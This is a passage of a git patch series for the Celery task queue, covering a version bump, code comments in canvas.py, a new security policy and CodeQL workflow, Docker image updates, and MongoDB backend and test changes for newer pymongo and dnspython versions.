@@ -2,7 +2,7 @@
|build-status| |coverage| |license| |wheel| |pyversion| |pyimp| |ocbackerbadge| |ocsponsorbadge|
-:Version: 5.2.0 (dawn-chorus)
+:Version: 5.2.1 (dawn-chorus)
:Web: https://docs.celeryproject.org/en/stable/index.html
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
diff --git a/celery/__init__.py b/celery/__init__.py
index 28a7de4f54b..320228e92ca 100644
--- a/celery/__init__.py
+++ b/celery/__init__.py
@@ -17,7 +17,7 @@
SERIES = 'dawn-chorus'
-__version__ = '5.2.0'
+__version__ = '5.2.1'
__author__ = 'Ask Solem'
__contact__ = 'auvipy@gmail.com'
__homepage__ = 'http://celeryproject.org'
diff --git a/docs/includes/introduction.txt b/docs/includes/introduction.txt
index 0b871532542..50292b1d7aa 100644
--- a/docs/includes/introduction.txt
+++ b/docs/includes/introduction.txt
@@ -1,4 +1,4 @@
-:Version: 5.2.0 (cliffs)
+:Version: 5.2.1 (dawn-chorus)
:Web: http://celeryproject.org/
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
From 120b61578c4103943f5407d3cde4899626143e8c Mon Sep 17 00:00:00 2001
From: Naomi Elstein
Date: Wed, 17 Nov 2021 11:15:26 +0200
Subject: [PATCH 140/177] Comments and questions on celery/canvas.py
---
celery/canvas.py | 25 +++++++++++++++++++++++--
1 file changed, 23 insertions(+), 2 deletions(-)
diff --git a/celery/canvas.py b/celery/canvas.py
index 8e9ac136f08..f0bcd2c5260 100644
--- a/celery/canvas.py
+++ b/celery/canvas.py
@@ -281,14 +281,17 @@ def freeze(self, _id=None, group_id=None, chord=None,
# XXX chord is also a class in outer scope.
opts = self.options
try:
+ # if there is already an id for this task, return it
tid = opts['task_id']
except KeyError:
+ # otherwise, use the _id sent to this function, falling back on a generated UUID
tid = opts['task_id'] = _id or uuid()
if root_id:
opts['root_id'] = root_id
if parent_id:
opts['parent_id'] = parent_id
if 'reply_to' not in opts:
+ # fall back on unique ID for this thread in the app
opts['reply_to'] = self.app.thread_oid
if group_id and "group_id" not in opts:
opts['group_id'] = group_id
@@ -676,6 +679,8 @@ def run(self, args=None, kwargs=None, group_id=None, chord=None,
else:
return results_from_prepare[0]
+ # in order for a chain to be frozen, each of the members of the chain individually needs to be frozen
+ # TODO figure out why we are always cloning before freeze
def freeze(self, _id=None, group_id=None, chord=None,
root_id=None, parent_id=None, group_index=None):
# pylint: disable=redefined-outer-name
@@ -703,6 +708,7 @@ def prepare_steps(self, args, kwargs, tasks,
use_link = True
steps = deque(tasks)
+ # optimization: now the pop func is a local variable
steps_pop = steps.pop
steps_extend = steps.extend
@@ -717,11 +723,15 @@ def prepare_steps(self, args, kwargs, tasks,
# get the next task in the chain.
while steps:
task = steps_pop()
+ # if steps is now empty, this is the first task - reverse order
+ # if i = 0, this is the last task - again, because we're reversed
is_first_task, is_last_task = not steps, not i
if not isinstance(task, abstract.CallableSignature):
task = from_dict(task, app=app)
if isinstance(task, group):
+ # when groups are nested, they are unrolled - all tasks within
+ # groups within groups should be called in parallel
task = maybe_unroll_group(task)
# first task gets partial args from chain
@@ -734,10 +744,11 @@ def prepare_steps(self, args, kwargs, tasks,
task.args = tuple(args) + tuple(task.args)
if isinstance(task, _chain):
- # splice the chain
+ # splice (unroll) the chain
steps_extend(task.tasks)
continue
+ # TODO why isn't this asserting is_last_task == False?
if isinstance(task, group) and prev_task:
# automatically upgrade group(...) | s to chord(group, s)
# for chords we freeze by pretending it's a normal
@@ -1230,9 +1241,15 @@ def _freeze_group_tasks(self, _id=None, group_id=None, chord=None,
root_id = opts.setdefault('root_id', root_id)
parent_id = opts.setdefault('parent_id', parent_id)
if isinstance(self.tasks, _regen):
- # We are draining from a geneator here.
+ # We are draining from a generator here.
+ # tasks1, tasks2 are each a clone of self.tasks
tasks1, tasks2 = itertools.tee(self._unroll_tasks(self.tasks))
+ # freeze each task in tasks1, results now holds AsyncResult for each task
results = regen(self._freeze_tasks(tasks1, group_id, chord, root_id, parent_id))
+ # TODO figure out why this makes sense -
+ # we freeze all tasks in the clone tasks1, and then zip the results
+ # with the IDs of tasks in the second clone, tasks2. and then, we build
+ # a generator that takes only the task IDs from tasks2.
self.tasks = regen(x[0] for x in zip(tasks2, results))
else:
new_tasks = []
@@ -1265,6 +1282,7 @@ def _freeze_tasks(self, tasks, group_id, chord, root_id, parent_id):
for group_index, task in enumerate(tasks))
def _unroll_tasks(self, tasks):
+ # should be refactored to: (maybe_signature(task, app=self._app, clone=True) for task in tasks)
yield from (maybe_signature(task, app=self._app).clone() for task in tasks)
def _freeze_unroll(self, new_tasks, group_id, chord, root_id, parent_id):
@@ -1274,6 +1292,7 @@ def _freeze_unroll(self, new_tasks, group_id, chord, root_id, parent_id):
group_index = 0
while stack:
task = maybe_signature(stack.popleft(), app=self._app).clone()
+ # if this is a group, flatten it by adding all of the group's tasks to the stack
if isinstance(task, group):
stack.extendleft(task.tasks)
else:
@@ -1364,8 +1383,10 @@ def freeze(self, _id=None, group_id=None, chord=None,
# XXX chord is also a class in outer scope.
if not isinstance(self.tasks, group):
self.tasks = group(self.tasks, app=self.app)
+ # first freeze all tasks in the header
header_result = self.tasks.freeze(
parent_id=parent_id, root_id=root_id, chord=self.body)
+ # secondly freeze all tasks in the body: those that should be called after the header
body_result = self.body.freeze(
_id, root_id=root_id, chord=chord, group_id=group_id,
group_index=group_index)
From b7473f9cb0610c91177b8492753c24f463ea558c Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Fri, 19 Nov 2021 11:23:04 +0600
Subject: [PATCH 141/177] create security policy doc
---
SECURITY.md | 17 +++++++++++++++++
1 file changed, 17 insertions(+)
create mode 100644 SECURITY.md
diff --git a/SECURITY.md b/SECURITY.md
new file mode 100644
index 00000000000..45213f838de
--- /dev/null
+++ b/SECURITY.md
@@ -0,0 +1,17 @@
+# Security Policy
+
+## Supported Versions
+
+The following versions of Celery are currently being supported with
+security updates.
+
+| Version | Supported |
+| ------- | ------------------ |
+| 5.2.x | :white_check_mark: |
+| 5.0.x | :x: |
+| 5.1.x | :white_check_mark: |
+| < 5.0 | :x: |
+
+## Reporting a Vulnerability
+
+Please reach out to auvipy@gmail.com & omer.drow@gmail.com for reporting security concerns via email.
From 3c4d4497d6bb3d53120704dc867634e355da74bc Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Fri, 19 Nov 2021 11:25:19 +0600
Subject: [PATCH 142/177] create codeql beta
---
.github/workflows/codeql-analysis.yml | 70 +++++++++++++++++++++++++++
1 file changed, 70 insertions(+)
create mode 100644 .github/workflows/codeql-analysis.yml
diff --git a/.github/workflows/codeql-analysis.yml b/.github/workflows/codeql-analysis.yml
new file mode 100644
index 00000000000..9f948a98cf9
--- /dev/null
+++ b/.github/workflows/codeql-analysis.yml
@@ -0,0 +1,70 @@
+# For most projects, this workflow file will not need changing; you simply need
+# to commit it to your repository.
+#
+# You may wish to alter this file to override the set of languages analyzed,
+# or to provide custom queries or build logic.
+#
+# ******** NOTE ********
+# We have attempted to detect the languages in your repository. Please check
+# the `language` matrix defined below to confirm you have the correct set of
+# supported CodeQL languages.
+#
+name: "CodeQL"
+
+on:
+ push:
+ branches: [ master ]
+ pull_request:
+ # The branches below must be a subset of the branches above
+ branches: [ master ]
+ schedule:
+ - cron: '18 4 * * 2'
+
+jobs:
+ analyze:
+ name: Analyze
+ runs-on: ubuntu-latest
+ permissions:
+ actions: read
+ contents: read
+ security-events: write
+
+ strategy:
+ fail-fast: false
+ matrix:
+ language: [ 'python' ]
+ # CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python', 'ruby' ]
+ # Learn more about CodeQL language support at https://git.io/codeql-language-support
+
+ steps:
+ - name: Checkout repository
+ uses: actions/checkout@v2
+
+ # Initializes the CodeQL tools for scanning.
+ - name: Initialize CodeQL
+ uses: github/codeql-action/init@v1
+ with:
+ languages: ${{ matrix.language }}
+ # If you wish to specify custom queries, you can do so here or in a config file.
+ # By default, queries listed here will override any specified in a config file.
+ # Prefix the list here with "+" to use these queries and those in the config file.
+ # queries: ./path/to/local/query, your-org/your-repo/queries@main
+
+ # Autobuild attempts to build any compiled languages (C/C++, C#, or Java).
+ # If this step fails, then you should remove it and run the build manually (see below)
+ - name: Autobuild
+ uses: github/codeql-action/autobuild@v1
+
+ # ℹ️ Command-line programs to run using the OS shell.
+ # 📚 https://git.io/JvXDl
+
+ # ✏️ If the Autobuild fails above, remove it and uncomment the following three lines
+ # and modify them (or add more) to build your code if your project
+ # uses a compiled language
+
+ #- run: |
+ # make bootstrap
+ # make release
+
+ - name: Perform CodeQL Analysis
+ uses: github/codeql-action/analyze@v1
From bc5a87883647a33085fcb25aba95bf721267abc0 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Sun, 21 Nov 2021 19:57:56 +0600
Subject: [PATCH 143/177] start with switching to debian slim image (#6995)
* start with python slim image
* update docker images & python versions
* update package
---
docker/Dockerfile | 20 ++++++++++----------
docker/docker-compose.yml | 8 ++++----
docker/docs/Dockerfile | 2 +-
docker/scripts/install-pyenv.sh | 8 ++++----
4 files changed, 19 insertions(+), 19 deletions(-)
diff --git a/docker/Dockerfile b/docker/Dockerfile
index 0cd557070d0..f7e36e957c4 100644
--- a/docker/Dockerfile
+++ b/docker/Dockerfile
@@ -1,4 +1,4 @@
-FROM ubuntu:focal
+FROM debian:bullseye-slim
ENV PYTHONUNBUFFERED 1
ENV PYTHONIOENCODING UTF-8
@@ -25,7 +25,7 @@ RUN apt-get update && apt-get install -y build-essential \
wget \
pypy3 \
pypy3-lib \
- python-openssl \
+ python3-openssl \
libncursesw5-dev \
zlib1g-dev \
pkg-config \
@@ -66,36 +66,36 @@ COPY --chown=1000:1000 docker/entrypoint /entrypoint
RUN chmod gu+x /entrypoint
# Define the local pyenvs
-RUN pyenv local python3.8 python3.7 python3.6 python3.9
+RUN pyenv local python3.9 python3.8 python3.7 python3.10
-RUN pyenv exec python3.6 -m pip install --upgrade pip setuptools wheel && \
- pyenv exec python3.7 -m pip install --upgrade pip setuptools wheel && \
+RUN pyenv exec python3.9 -m pip install --upgrade pip setuptools wheel && \
pyenv exec python3.8 -m pip install --upgrade pip setuptools wheel && \
- pyenv exec python3.9 -m pip install --upgrade pip setuptools wheel
+ pyenv exec python3.7 -m pip install --upgrade pip setuptools wheel && \
+ pyenv exec python3.10 -m pip install --upgrade pip setuptools wheel
# Setup one celery environment for basic development use
-RUN pyenv exec python3.8 -m pip install \
+RUN pyenv exec python3.9 -m pip install \
-r requirements/dev.txt \
-r requirements/test.txt \
-r requirements/test-ci-default.txt \
-r requirements/docs.txt \
-r requirements/test-integration.txt \
-r requirements/pkgutils.txt && \
- pyenv exec python3.7 -m pip install \
+ pyenv exec python3.8 -m pip install \
-r requirements/dev.txt \
-r requirements/test.txt \
-r requirements/test-ci-default.txt \
-r requirements/docs.txt \
-r requirements/test-integration.txt \
-r requirements/pkgutils.txt && \
- pyenv exec python3.6 -m pip install \
+ pyenv exec python3.7 -m pip install \
-r requirements/dev.txt \
-r requirements/test.txt \
-r requirements/test-ci-default.txt \
-r requirements/docs.txt \
-r requirements/test-integration.txt \
-r requirements/pkgutils.txt && \
- pyenv exec python3.9 -m pip install \
+ pyenv exec python3.10 -m pip install \
-r requirements/dev.txt \
-r requirements/test.txt \
-r requirements/test-ci-default.txt \
diff --git a/docker/docker-compose.yml b/docker/docker-compose.yml
index 037947f35e0..23256d12301 100644
--- a/docker/docker-compose.yml
+++ b/docker/docker-compose.yml
@@ -27,16 +27,16 @@ services:
- azurite
rabbit:
- image: rabbitmq:3.8.0
+ image: rabbitmq:3.9
redis:
- image: redis:5.0.6
+ image: redis:6.2
dynamodb:
- image: dwmkerr/dynamodb:38
+ image: amazon/dynamodb-local:latest
azurite:
- image: mcr.microsoft.com/azure-storage/azurite:3.10.0
+ image: mcr.microsoft.com/azure-storage/azurite:latest
docs:
image: celery/docs
diff --git a/docker/docs/Dockerfile b/docker/docs/Dockerfile
index 616919f2b54..711380dde61 100644
--- a/docker/docs/Dockerfile
+++ b/docker/docs/Dockerfile
@@ -1,4 +1,4 @@
-FROM python:3.9-slim-buster
+FROM python:3.9-slim-bullseye
ENV PYTHONUNBUFFERED 1
ENV PYTHONDONTWRITEBYTECODE 1
diff --git a/docker/scripts/install-pyenv.sh b/docker/scripts/install-pyenv.sh
index 2f3093ced10..dcf5f2a6d63 100644
--- a/docker/scripts/install-pyenv.sh
+++ b/docker/scripts/install-pyenv.sh
@@ -7,7 +7,7 @@ curl -L https://raw.githubusercontent.com/pyenv/pyenv-installer/master/bin/pyenv
git clone https://github.com/s1341/pyenv-alias.git $(pyenv root)/plugins/pyenv-alias
# Python versions to test against
-VERSION_ALIAS="python3.6" pyenv install 3.6.12
-VERSION_ALIAS="python3.7" pyenv install 3.7.9
-VERSION_ALIAS="python3.8" pyenv install 3.8.7
-VERSION_ALIAS="python3.9" pyenv install 3.9.1
+VERSION_ALIAS="python3.10" pyenv install 3.10.0
+VERSION_ALIAS="python3.7" pyenv install 3.7.12
+VERSION_ALIAS="python3.8" pyenv install 3.8.12
+VERSION_ALIAS="python3.9" pyenv install 3.9.9
From 993b1e62a77c915f72b6e433ffcd9b19e35b712b Mon Sep 17 00:00:00 2001
From: "pre-commit-ci[bot]"
<66853113+pre-commit-ci[bot]@users.noreply.github.com>
Date: Mon, 22 Nov 2021 16:43:10 +0000
Subject: [PATCH 144/177] [pre-commit.ci] pre-commit autoupdate
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
updates:
- [github.com/asottile/pyupgrade: v2.29.0 → v2.29.1](https://github.com/asottile/pyupgrade/compare/v2.29.0...v2.29.1)
---
.pre-commit-config.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index a542597b1c8..8e2429511ac 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -1,6 +1,6 @@
repos:
- repo: https://github.com/asottile/pyupgrade
- rev: v2.29.0
+ rev: v2.29.1
hooks:
- id: pyupgrade
args: ["--py37-plus"]
From 29042c91018bfefa36ec4275675f4b50db3b96c3 Mon Sep 17 00:00:00 2001
From: Andrew Ignatov
Date: Wed, 24 Nov 2021 23:22:53 +0200
Subject: [PATCH 145/177] * space added
---
celery/bin/worker.py | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/celery/bin/worker.py b/celery/bin/worker.py
index 7e0d3247ab5..16fffcc794d 100644
--- a/celery/bin/worker.py
+++ b/celery/bin/worker.py
@@ -194,7 +194,7 @@ def detach(path, argv, logfile=None, pidfile=None, uid=None,
help_group="Pool Options",
help="Number of child processes processing the queue. "
"The default is the number of CPUs available"
- "on your system.")
+ " on your system.")
@click.option('-P',
'--pool',
default='prefork',
From fad54a99db1aafba505d26c79d7d9368bbeaa4df Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Thu, 25 Nov 2021 11:21:38 +0600
Subject: [PATCH 146/177] unpin redis
---
requirements/extras/redis.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/requirements/extras/redis.txt b/requirements/extras/redis.txt
index 6a0c1d208bf..a88793fe8a5 100644
--- a/requirements/extras/redis.txt
+++ b/requirements/extras/redis.txt
@@ -1 +1 @@
-redis>=3.4.1,<4.0.0
+redis>=3.4.1,!=4.0.0,!=4.0.1
From f76968936d988b857a52d7ee6bcd829d8cc2d0eb Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Fri, 26 Nov 2021 15:02:29 +0600
Subject: [PATCH 147/177] try pypy3.8 beta (#6998)
* try pypy3.8 beta
* try windows latest
---
.github/workflows/python-package.yml | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml
index 54fdc3596dc..575650afff1 100644
--- a/.github/workflows/python-package.yml
+++ b/.github/workflows/python-package.yml
@@ -5,14 +5,14 @@ name: Celery
on:
push:
- branches: [ 'master', '5.0' ]
+ branches: [ 'master']
paths:
- '**.py'
- '**.txt'
- '.github/workflows/python-package.yml'
- '**.toml'
pull_request:
- branches: [ 'master', '5.0' ]
+ branches: [ 'master']
paths:
- '**.py'
- '**.txt'
@@ -26,8 +26,8 @@ jobs:
strategy:
fail-fast: false
matrix:
- python-version: ['3.7', '3.8', '3.9', '3.10', 'pypy-3.7','pypy-3.8']
- os: ["ubuntu-20.04", "windows-2019"]
+ python-version: ['3.7', '3.8', '3.9', '3.10', 'pypy-3.7', 'pypy-3.8']
+ os: ["ubuntu-20.04", "windows-latest"]
steps:
- name: Install apt packages
From 398f2f75ae5a51d71238f5b540442e7ea23d1755 Mon Sep 17 00:00:00 2001
From: Naomi Elstein
Date: Tue, 30 Nov 2021 14:26:47 +0200
Subject: [PATCH 148/177] Upgrade required pymongo version to 3.11.1
---
celery/backends/mongodb.py | 11 +----------
requirements/extras/mongodb.txt | 2 +-
t/unit/backends/test_mongodb.py | 16 ----------------
3 files changed, 2 insertions(+), 27 deletions(-)
diff --git a/celery/backends/mongodb.py b/celery/backends/mongodb.py
index b78e4d015b4..1833561f530 100644
--- a/celery/backends/mongodb.py
+++ b/celery/backends/mongodb.py
@@ -265,16 +265,7 @@ def __reduce__(self, args=(), kwargs=None):
def _get_database(self):
conn = self._get_connection()
- db = conn[self.database_name]
- if self.user and self.password:
- source = self.options.get(
- 'authsource',
- self.database_name or 'admin'
- )
- if not db.authenticate(self.user, self.password, source=source):
- raise ImproperlyConfigured(
- 'Invalid MongoDB username or password.')
- return db
+ return conn[self.database_name]
@cached_property
def database(self):
diff --git a/requirements/extras/mongodb.txt b/requirements/extras/mongodb.txt
index 7ad511e68c5..b2264dfbbe2 100644
--- a/requirements/extras/mongodb.txt
+++ b/requirements/extras/mongodb.txt
@@ -1 +1 @@
-pymongo[srv]>=3.3.0,<3.12.1
+pymongo[srv]>=3.11.1
diff --git a/t/unit/backends/test_mongodb.py b/t/unit/backends/test_mongodb.py
index b56e928b026..824a35cbf67 100644
--- a/t/unit/backends/test_mongodb.py
+++ b/t/unit/backends/test_mongodb.py
@@ -273,8 +273,6 @@ def test_get_database_no_existing(self, mock_get_connection):
assert database is mock_database
assert self.backend.__dict__['database'] is mock_database
- mock_database.authenticate.assert_called_once_with(
- MONGODB_USER, MONGODB_PASSWORD, source=self.backend.database_name)
@patch('celery.backends.mongodb.MongoBackend._get_connection')
def test_get_database_no_existing_no_auth(self, mock_get_connection):
@@ -290,7 +288,6 @@ def test_get_database_no_existing_no_auth(self, mock_get_connection):
database = self.backend.database
assert database is mock_database
- mock_database.authenticate.assert_not_called()
assert self.backend.__dict__['database'] is mock_database
@patch('celery.backends.mongodb.MongoBackend._get_database')
@@ -489,19 +486,6 @@ def test_cleanup(self, mock_get_database):
self.backend.cleanup()
mock_collection.delete_many.assert_not_called()
- def test_get_database_authfailure(self):
- x = MongoBackend(app=self.app)
- x._get_connection = Mock()
- conn = x._get_connection.return_value = {}
- db = conn[x.database_name] = Mock()
- db.authenticate.return_value = False
- x.user = 'jerry'
- x.password = 'cere4l'
- with pytest.raises(ImproperlyConfigured):
- x._get_database()
- db.authenticate.assert_called_with('jerry', 'cere4l',
- source=x.database_name)
-
def test_prepare_client_options(self):
with patch('pymongo.version_tuple', new=(3, 0, 3)):
options = self.backend._prepare_client_options()
From b4ac2b109e484982bea4adfebb21d53f9e8edc83 Mon Sep 17 00:00:00 2001
From: Naomi Elstein
Date: Tue, 30 Nov 2021 17:31:20 +0200
Subject: [PATCH 149/177] Fix test - separate test_init_mongodb_dns_seedlist
into two tests, one for DNS versions 1.X and another for versions > 2 based
on the pymongo srv_resolver logic
https://github.com/mongodb/mongo-python-driver/blob/e3d1d6f5b48101654a05493fd6eec7fe3fa014bd/pymongo/srv_resolver.py#L38
---
t/unit/backends/test_mongodb.py | 128 +++++++++++++++++++-------------
1 file changed, 75 insertions(+), 53 deletions(-)
diff --git a/t/unit/backends/test_mongodb.py b/t/unit/backends/test_mongodb.py
index 824a35cbf67..2f597aa5cf0 100644
--- a/t/unit/backends/test_mongodb.py
+++ b/t/unit/backends/test_mongodb.py
@@ -1,7 +1,8 @@
import datetime
from pickle import dumps, loads
from unittest.mock import ANY, MagicMock, Mock, patch, sentinel
+import dns.version
import pytest
import pytz
from kombu.exceptions import EncodeError
@@ -25,9 +28,42 @@
MONGODB_DATABASE = 'testing'
MONGODB_COLLECTION = 'collection1'
MONGODB_GROUP_COLLECTION = 'group_collection1'
+# uri with user, password, database name, replica set, DNS seedlist format
+MONGODB_SEEDLIST_URI = ('srv://'
+ 'celeryuser:celerypassword@'
+ 'dns-seedlist-host.example.com/'
+ 'celerydatabase')
+MONGODB_BACKEND_HOST = [
+ 'mongo1.example.com:27017',
+ 'mongo2.example.com:27017',
+ 'mongo3.example.com:27017',
+ ]
+CELERY_USER = 'celeryuser'
+CELERY_PASSWORD = 'celerypassword'
+CELERY_DATABASE = 'celerydatabase'
pytest.importorskip('pymongo')
+def fake_resolver():
+ Name = pytest.importorskip('dns.name').Name
+ TXT = pytest.importorskip('dns.rdtypes.ANY.TXT').TXT
+ SRV = pytest.importorskip('dns.rdtypes.IN.SRV').SRV
+
+ def mock_resolver(_, rdtype, rdclass=None, lifetime=None, **kwargs):
+
+ if rdtype == 'SRV':
+ return [
+ SRV(0, 0, 0, 0, 27017, Name(labels=hostname))
+ for hostname in [
+ b'mongo1.example.com'.split(b'.'),
+ b'mongo2.example.com'.split(b'.'),
+ b'mongo3.example.com'.split(b'.')
+ ]
+ ]
+ elif rdtype == 'TXT':
+ return [TXT(0, 0, [b'replicaSet=rs0'])]
+
+ return mock_resolver
class test_MongoBackend:
default_url = 'mongodb://uuuu:pwpw@hostname.dom/database'
@@ -86,18 +122,14 @@ def test_init_with_settings(self):
'mongo3.example.com:27017/'
'celerydatabase?replicaSet=rs0')
mb = MongoBackend(app=self.app, url=uri)
- assert mb.mongo_host == [
- 'mongo1.example.com:27017',
- 'mongo2.example.com:27017',
- 'mongo3.example.com:27017',
- ]
+ assert mb.mongo_host == MONGODB_BACKEND_HOST
assert mb.options == dict(
mb._prepare_client_options(),
replicaset='rs0',
)
- assert mb.user == 'celeryuser'
- assert mb.password == 'celerypassword'
- assert mb.database_name == 'celerydatabase'
+ assert mb.user == CELERY_USER
+ assert mb.password == CELERY_PASSWORD
+ assert mb.database_name == CELERY_DATABASE
# same uri, change some parameters in backend settings
self.app.conf.mongodb_backend_settings = {
@@ -109,65 +141,55 @@ def test_init_with_settings(self):
},
}
mb = MongoBackend(app=self.app, url=uri)
- assert mb.mongo_host == [
- 'mongo1.example.com:27017',
- 'mongo2.example.com:27017',
- 'mongo3.example.com:27017',
- ]
+ assert mb.mongo_host == MONGODB_BACKEND_HOST
assert mb.options == dict(
mb._prepare_client_options(),
replicaset='rs1',
socketKeepAlive=True,
)
assert mb.user == 'backenduser'
- assert mb.password == 'celerypassword'
+ assert mb.password == CELERY_PASSWORD
assert mb.database_name == 'another_db'
mb = MongoBackend(app=self.app, url='mongodb://')
- def test_init_mongodb_dns_seedlist(self):
- Name = pytest.importorskip('dns.name').Name
- TXT = pytest.importorskip('dns.rdtypes.ANY.TXT').TXT
- SRV = pytest.importorskip('dns.rdtypes.IN.SRV').SRV
-
+ @pytest.mark.skipif(dns.version.MAJOR > 1,
+ reason="For dnspython version >= 2, pymongo's"
+ "srv_resolver calls resolver.resolve")
+ def test_init_mongodb_dnspython1_seedlist(self):
+ resolver = fake_resolver()
self.app.conf.mongodb_backend_settings = None
- def mock_resolver(_, rdtype, rdclass=None, lifetime=None, **kwargs):
-
- if rdtype == 'SRV':
- return [
- SRV(0, 0, 0, 0, 27017, Name(labels=hostname))
- for hostname in [
- b'mongo1.example.com'.split(b'.'),
- b'mongo2.example.com'.split(b'.'),
- b'mongo3.example.com'.split(b'.')
- ]
- ]
- elif rdtype == 'TXT':
- return [TXT(0, 0, [b'replicaSet=rs0'])]
+ with patch('dns.resolver.query', side_effect=resolver):
+ mb = self.perform_seedlist_assertions()
+ assert mb.options == dict(
+ mb._prepare_client_options(),
+ replicaset='rs0',
+ ssl=True
+ )
- # uri with user, password, database name, replica set,
- # DNS seedlist format
- uri = ('srv://'
- 'celeryuser:celerypassword@'
- 'dns-seedlist-host.example.com/'
- 'celerydatabase')
+ @pytest.mark.skipif(dns.version.MAJOR <= 1,
+ reason="For dnspython versions 1.X, pymongo's"
+ "srv_resolver calls resolver.query")
+ def test_init_mongodb_dnspython2_seedlist(self):
+ resolver = fake_resolver()
+ self.app.conf.mongodb_backend_settings = None
- with patch('dns.resolver.query', side_effect=mock_resolver):
- mb = MongoBackend(app=self.app, url=uri)
- assert mb.mongo_host == [
- 'mongo1.example.com:27017',
- 'mongo2.example.com:27017',
- 'mongo3.example.com:27017',
- ]
+ with patch('dns.resolver.resolve', side_effect=resolver):
+ mb = self.perform_seedlist_assertions()
assert mb.options == dict(
mb._prepare_client_options(),
replicaset='rs0',
- ssl=True
+ tls=True
)
- assert mb.user == 'celeryuser'
- assert mb.password == 'celerypassword'
- assert mb.database_name == 'celerydatabase'
+
+ def perform_seedlist_assertions(self):
+ mb = MongoBackend(app=self.app, url=MONGODB_SEEDLIST_URI)
+ assert mb.mongo_host == MONGODB_BACKEND_HOST
+ assert mb.user == CELERY_USER
+ assert mb.password == CELERY_PASSWORD
+ assert mb.database_name == CELERY_DATABASE
+ return mb
def test_ensure_mongodb_uri_compliance(self):
mb = MongoBackend(app=self.app, url=None)
@@ -176,7 +198,7 @@ def test_ensure_mongodb_uri_compliance(self):
assert compliant_uri('mongodb://') == 'mongodb://localhost'
assert compliant_uri('mongodb+something://host') == \
- 'mongodb+something://host'
+ 'mongodb+something://host'
assert compliant_uri('something://host') == 'mongodb+something://host'
@@ -234,8 +256,8 @@ def test_get_connection_with_authmechanism(self):
connection = mb._get_connection()
mock_Connection.assert_called_once_with(
host=['localhost:27017'],
- username='celeryuser',
- password='celerypassword',
+ username=CELERY_USER,
+ password=CELERY_PASSWORD,
authmechanism='SCRAM-SHA-256',
**mb._prepare_client_options()
)
@@ -635,7 +657,7 @@ def find_one(self, task_id):
@pytest.mark.parametrize("serializer,result_type,result", [
(s, type(i['result']), i['result']) for i in SUCCESS_RESULT_TEST_DATA
for s in i['serializers']]
- )
+ )
def test_encode_success_results(self, mongo_backend_factory, serializer,
result_type, result):
backend = mongo_backend_factory(serializer=serializer)
From aabf595beeedc1416b1ba269950e20081279d530 Mon Sep 17 00:00:00 2001
From: Naomi Elstein
Date: Tue, 30 Nov 2021 17:32:49 +0200
Subject: [PATCH 150/177] Fix test - separate test_init_mongodb_dns_seedlist
into two tests, one for DNS versions 1.X and another for versions > 2 based
on the pymongo srv_resolver logic
https://github.com/mongodb/mongo-python-driver/blob/e3d1d6f5b48101654a05493fd6eec7fe3fa014bd/pymongo/srv_resolver.py#L38
---
t/unit/backends/test_mongodb.py | 1 +
1 file changed, 1 insertion(+)
diff --git a/t/unit/backends/test_mongodb.py b/t/unit/backends/test_mongodb.py
index 2f597aa5cf0..24772639191 100644
--- a/t/unit/backends/test_mongodb.py
+++ b/t/unit/backends/test_mongodb.py
@@ -183,6 +183,7 @@ def test_init_mongodb_dnspython2_seedlist(self):
tls=True
)
+
def perform_seedlist_assertions(self):
mb = MongoBackend(app=self.app, url=MONGODB_SEEDLIST_URI)
assert mb.mongo_host == MONGODB_BACKEND_HOST
From 00bcecedb49e7c7dbe1d1968661347544e4d7987 Mon Sep 17 00:00:00 2001
From: Naomi Elstein
Date: Tue, 30 Nov 2021 17:33:57 +0200
Subject: [PATCH 151/177] Undo dummy commit
---
t/unit/backends/test_mongodb.py | 1 -
1 file changed, 1 deletion(-)
diff --git a/t/unit/backends/test_mongodb.py b/t/unit/backends/test_mongodb.py
index 24772639191..2f597aa5cf0 100644
--- a/t/unit/backends/test_mongodb.py
+++ b/t/unit/backends/test_mongodb.py
@@ -183,7 +183,6 @@ def test_init_mongodb_dnspython2_seedlist(self):
tls=True
)
-
def perform_seedlist_assertions(self):
mb = MongoBackend(app=self.app, url=MONGODB_SEEDLIST_URI)
assert mb.mongo_host == MONGODB_BACKEND_HOST
From 40af53f96c407ce0c3a5679270f8467994f46e1d Mon Sep 17 00:00:00 2001
From: Naomi Elstein
Date: Tue, 30 Nov 2021 17:43:12 +0200
Subject: [PATCH 152/177] Remove unused import
---
t/unit/backends/test_mongodb.py | 2 --
1 file changed, 2 deletions(-)
diff --git a/t/unit/backends/test_mongodb.py b/t/unit/backends/test_mongodb.py
index 2f597aa5cf0..135222c8ca1 100644
--- a/t/unit/backends/test_mongodb.py
+++ b/t/unit/backends/test_mongodb.py
@@ -1,5 +1,3 @@
-import perform as perform
-
import datetime
from pickle import dumps, loads
from unittest.mock import ANY, MagicMock, Mock, patch, sentinel
From 1fa79c6203977cd13545f27749a898a71991e728 Mon Sep 17 00:00:00 2001
From: Naomi Elstein
Date: Tue, 30 Nov 2021 18:57:26 +0200
Subject: [PATCH 153/177] Divide test cases based on pymongo version: options
returns tls instead of ssl as of pymongo version 4.0 (the values of each are
always identical - they are aliases)
---
t/unit/backends/test_mongodb.py | 45 ++++++++++++++++++++++++++++++---
1 file changed, 42 insertions(+), 3 deletions(-)
diff --git a/t/unit/backends/test_mongodb.py b/t/unit/backends/test_mongodb.py
index 135222c8ca1..f93107d76c8 100644
--- a/t/unit/backends/test_mongodb.py
+++ b/t/unit/backends/test_mongodb.py
@@ -3,6 +3,7 @@
from unittest.mock import ANY, MagicMock, Mock, patch, sentinel
import dns.version
+import pymongo
import pytest
import pytz
